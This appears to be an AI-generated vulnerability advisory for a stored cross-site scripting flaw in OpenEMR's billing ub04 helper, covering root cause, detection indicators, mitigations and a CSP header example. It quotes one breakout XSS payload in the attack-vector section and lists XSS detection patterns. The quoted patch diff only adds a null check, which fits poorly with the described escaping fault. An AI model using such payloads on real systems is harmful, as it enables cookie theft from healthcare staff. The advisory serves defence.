CVE-2025-67491 Overview
CVE-2025-67491 is a stored cross-site scripting (XSS) vulnerability affecting OpenEMR, a widely-used free and open source electronic health records (EHR) and medical practice management application. The vulnerability exists in the ub04 helper component of the billing interface, where the $data variable is passed in a click event handler enclosed in single quotes without proper sanitization.
Despite the use of json_encode, attackers with low privileges can inject malicious JavaScript payloads that persist on the server. This stored XSS attack enables malicious users to steal session cookies and perform unauthorized actions while impersonating administrators, posing significant risks to healthcare data confidentiality and system integrity.
Critical Impact
Low-privileged users can embed persistent malicious JavaScript payloads in the billing interface to steal administrator session cookies and perform unauthorized actions, potentially compromising sensitive patient health records and medical practice data.
Affected Products
- OpenEMR versions 5.0.0.5 through 7.0.3.4
- OpenEMR billing interface ub04 helper component
- Healthcare organizations using vulnerable OpenEMR deployments
Discovery Timeline
- 2026-02-25 - CVE-2025-67491 published to NVD
- 2026-02-25 - Last updated in NVD database
Technical Details for CVE-2025-67491
Vulnerability Analysis
This stored XSS vulnerability stems from insufficient input sanitization in the ub04_helpers.php file within OpenEMR's billing interface. The vulnerable code passes user-controlled data through a click event handler where it is enclosed in single quotes. While the application employs json_encode as a defensive measure, this encoding is insufficient to prevent XSS attacks when the output context is an HTML attribute within single quotes.
An attacker with low-privilege access to the billing system can craft a payload that breaks out of the single-quote context and injects arbitrary HTML and JavaScript. The malicious payload persists in the database and executes whenever other users—including administrators—view the affected billing records. This persistence makes the attack particularly dangerous in healthcare environments where billing data is frequently accessed by multiple staff members with varying privilege levels.
Root Cause
The root cause is improper output encoding in the interface/billing/ub04_helpers.php file. The $data variable is inserted into an HTML onclick attribute without context-appropriate escaping. While json_encode provides some protection against JavaScript string escaping, it does not properly handle HTML attribute context escaping, allowing attackers to break out of the attribute value and inject malicious content.
Attack Vector
The attack is network-accessible and requires low privileges (authenticated user with access to billing functions). User interaction is required as a victim must view the page containing the malicious payload. An attacker can inject a payload such as ac' ><img src=x onerror=alert(document.cookie)> into billing form fields. When another user views the affected record, the malicious JavaScript executes in their browser context, potentially stealing session tokens or performing actions with the victim's privileges.
// Security patch in interface/billing/ub04_form.php - Merge commit from fork (#9698)
var ii = i+1;
if(typeof(ub04id[ii]) != 'undefined' && ub04id[ii] !== ""){
var val = ub04id[ii];
- if( val.length > max && max > 0 ){
+ if(val != null && val.length > max && max > 0 ){
val = ub04id[ii].substring(0,max);
}
document.getElementById("ub04id"+ ii.toString()).value = val;
Source: GitHub Commit Log
Detection Methods for CVE-2025-67491
Indicators of Compromise
- Unusual JavaScript code patterns in billing records containing <script>, onerror=, onclick=, or similar event handlers
- Session cookie exfiltration attempts in network logs targeting external domains
- Billing record entries containing HTML tags such as <img>, <iframe>, or <svg> with event attributes
- Unexpected administrator actions performed during times when legitimate admins were not active
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect XSS payload patterns in billing form submissions
- Enable Content Security Policy (CSP) headers to prevent inline script execution and report violations
- Deploy endpoint detection solutions to monitor for suspicious browser behavior and credential theft attempts
- Review application logs for billing interface access patterns that suggest reconnaissance or exploitation
Monitoring Recommendations
- Monitor OpenEMR audit logs for unusual billing record modifications or access patterns
- Configure alerts for CSP violation reports indicating attempted XSS execution
- Track session anomalies such as session tokens used from unexpected IP addresses or user agents
- Implement database query logging to detect injection of HTML/JavaScript content in billing fields
How to Mitigate CVE-2025-67491
Immediate Actions Required
- Upgrade OpenEMR to version 7.0.4 or later immediately to receive the security patch
- Audit existing billing records in the database for signs of injected malicious content
- Force session invalidation and password resets for all users, especially administrators, if compromise is suspected
- Implement Content Security Policy headers to provide defense-in-depth against XSS attacks
Patch Information
OpenEMR version 7.0.4 addresses this vulnerability by implementing proper input validation and output encoding. The fix adds null checking and improves sanitization of the $data variable before it is rendered in HTML context. Organizations should prioritize this upgrade given the sensitive nature of healthcare data managed by OpenEMR.
Detailed patch information is available in the GitHub Security Advisory and the commit implementing the fix.
Workarounds
- Restrict access to the billing interface to only essential personnel until patching is complete
- Implement WAF rules to block requests containing common XSS payload patterns targeting billing endpoints
- Enable strict Content Security Policy headers to prevent execution of injected scripts
- Consider placing the OpenEMR billing interface behind additional authentication or network segmentation
# Configuration example - Apache CSP header to mitigate XSS
# Add to OpenEMR Apache configuration or .htaccess
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'none';"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
